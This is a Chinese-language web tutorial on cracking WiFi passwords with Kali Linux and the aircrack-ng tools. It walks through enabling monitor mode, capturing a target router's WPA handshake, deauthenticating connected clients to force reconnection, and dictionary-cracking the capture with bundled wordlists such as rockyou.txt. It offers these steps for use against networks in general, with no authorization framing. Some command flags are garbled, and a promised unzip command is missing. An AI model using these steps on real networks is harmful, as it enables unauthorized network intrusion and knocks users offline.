破解WIFI详细教程(破解WIFI详细教程)

准备工具•笔记本一台,我来为大家科普一下关于破解WIFI详细教程?下面希望有你要的答案,我们一起来看看吧!

破解WIFI详细教程(破解WIFI详细教程)

破解WIFI详细教程

今日主题:如何破解WIFI

准备工具

•笔记本一台

•usb无线网卡【我用的是小米的】

•kali系统【可以在虚拟机里装,建议用2019年及以下版本

VMware Workstation15虚拟机安装

可以参考http://www.jianshu.com/p/552179808ebf

kali安装

可以参考http://www.cnblogs.com/changjue/p/11244585.html

WIFI加密方式

1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。

2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。

3.WPA-PSK[TKIP] WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。

start

打开虚拟机,插入usb网卡,把网卡放到虚拟机来

桌面右键,选择Open in Terminal打开终端

显示网卡信息

airmon-ng

开启网卡监控

airmon-ng start wlan0

用ifconfig命令查看一下网卡信息

ifconfig

可以看到网卡的名字已经变了

扫描WIFI信号

airodump-ng wlan0mon

拿到握手包

airodump-ng -w freedom -c 11 -–bssid 44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one

解释:

-c:指定信道[ch]

-w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字

--bssid:指定路由器的MAC

再开一个终端输入命令

aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon – -ignore-negative-one

使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包

解释:

-0:指定发送反认证包的个数(阿利伯数字0)

-a:指定路由器的MAC

-c:指定客户机的MAC

出现下图就是抓取成功

破解握手包

aircrack-ng -w dict freedom-*.cap

dict:字典的名字

freedom-*.cap:握手包

破解成功

补充

•系统自带了密码字典,我用的是我自己的

字典位置如下:

/usr/share/john/password.lst

/usr/share/wfuzz/wordlist

/usr/share/ wordlists/rockyou.txt

最后一个路径下的文件默认是压缩的,可以通过以下命令解压

•反向认证的原理是让其中一个客户端下线,然后他再次连接,就可以获取握手包•信号扫描结束或者进程终止:ctrl c


免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页